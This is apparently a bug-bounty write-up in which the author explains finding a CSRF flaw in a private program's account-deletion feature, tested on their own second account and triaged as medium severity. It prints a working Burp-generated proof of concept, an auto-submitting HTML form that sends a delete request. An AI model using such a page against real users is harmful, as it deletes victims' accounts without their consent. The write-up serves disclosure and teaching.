In the name of Allah, i begin.
Hi. I am Orin from Bangladesh. I am a medical student. for last couple of months I have been trying to get atleast one of my bug triaged but all I have been getting is duplicate. But finally one of my bug got triaged. Here I’m gonna explain how I exploited it.
Recently I got invited into a private program. Normally I look for every button or feature of a website and poke around a little bit to see how that function works and how can I manipulate it. In there most of the feature used CSRF token accept the delete button and no confirmation mail was sent to verify it.
So I quickly generated a CSRF payload (using burp) and tried it on my second account. And BOoM! It got executed. I was successfully able to delete the second account through CSRF. Here is my payload :
<html>
<! — CSRF PoC — generated by Burp Suite Professional →
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”https://www.[REDACTED].com/$victim_username/main/send_delete_request" method=”POST”>
<input type=”hidden” name=”message” value=”Bug Hunting Test 1" />
<input type=”submit” value=”Submit request” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>It got triaged as medium severity and I got 7 points for it.
